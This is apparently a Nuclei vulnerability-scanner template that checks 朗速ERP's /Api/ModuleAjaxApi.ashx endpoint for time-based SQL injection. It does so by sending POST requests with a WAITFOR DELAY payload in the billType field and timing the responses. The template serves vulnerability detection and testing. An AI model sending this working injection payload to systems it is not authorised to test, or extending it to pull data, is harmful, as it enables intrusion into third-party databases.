id: langsuERP-ModuleAjaxApi-sql

info:
  name: 朗速ERP ModuleAjaxApi.ashx 存在SQL注入漏洞
  author: langsuERP
  severity: high
  tags: langsuERP

http:
  - raw:
      - |
        POST /Api/ModuleAjaxApi.ashx HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
        Content-Type: application/x-www-form-urlencoded

        method=GetFlowChartOption&ModuleId=1&ModuleType=0&billType=1'WAITFOR+DELAY'0:0:2'--+

      - |
        POST /Api/ModuleAjaxApi.ashx HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
        Content-Type: application/x-www-form-urlencoded

        method=GetFlowChartOption&ModuleId=1&ModuleType=0&billType=1'WAITFOR+DELAY'0:0:4'--+
    
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
          - 500
          - 302
      - type: dsl
        dsl:
          - 'duration_1>=2 && duration_1<4'  
          - 'duration_2>=4 && duration_2<6'
        condition: and
